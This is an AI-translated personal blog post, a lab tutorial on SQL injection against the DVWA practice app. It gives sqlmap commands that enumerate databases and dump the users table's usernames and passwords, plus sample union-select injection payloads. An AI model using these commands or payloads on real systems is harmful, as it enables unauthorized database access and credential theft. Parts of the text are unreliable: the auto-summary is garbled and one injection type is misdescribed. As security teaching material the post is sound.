banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github
HomeArchives[Code]Rust[区块链]Blockchain[引擎]Rust-Bevy[安全]Web2Security

SQLmap and SQL injection demo

#Web2Security#SqlMap34
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
SQLmap is a tool used in the DVWA environment to detect and exploit SQL injection vulnerabilities. It intercepts the image.png file and copies it to the sqlmap directory. By running sqlmap, it can identify the PHP version, Nginx version, and the database and its version. It can also identify the databases and types of injection vulnerabilities present. By querying the dvwa database, it can find the tables and columns, and retrieve data such as usernames and passwords. SQL injection involves injecting user input into code and executing it as a SQL statement. Different types of SQL injection include union, boolean, delay, error-based, wide byte, and stacked injections. The basic steps involve identifying the injection point, determining the number of columns, finding the point of reflection, and querying for relevant information.

SQLmap#

Environment: DVWA

image.png
Enter any number in User ID
Intercepted by brupSuite, can be obtained
image.png
Select all, copy to the sqlmap root directory, create a new .txt file
image.png
Then run sqlmap in CMD:
py .\sqlmap.py -r .\sql.txt
image.png
Here sqlmap has detected the PHP version, Nginx version, and the database and its version used
Then use
py .\sqlmap.py -r .\sql.txt --dbs
To detect the databases included and four types of injection vulnerabilities
(Boolean-based blind, error-based, time-based blind, and UNION query-based)
image.png

Enter
py .\sqlmap.py -r .\sql.txt -D dvwa --tables
To query the data tables contained in the dvwa database
image.png

py .\sqlmap.py -r .\sql.txt -D dvwa -T users --columns
To view the fields in the users table, see user and password
image.png
py .\sqlmap.py -r .\sql.txt -D dvwa -T users -C user,password --dump
To retrieve the data of user and password
image.png

SQL Injection#

The core of SQL injection
Concatenate user input data into the code and execute it as an SQL statement.
Types of SQL injection:
Union-based injection: Concatenate union select at the end
Boolean-based blind injection: Check if the webpage displays normally
Time-based blind injection: Use sleep() method to check if the database executes
Error-based injection: Use database error feedback to obtain data
Wide character injection: Write a large number of junk characters
Stacked injection: Use semicolons to concatenate multiple statements

Basic steps:
Identify the injection point
id=1 and 1=2
Determine the number of fields
id=1 order by 1
Identify the echo point
id=1 and 1=2 union select 1,2,3
Query related content
id=1 and 1=2 union select 1,database(),3

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.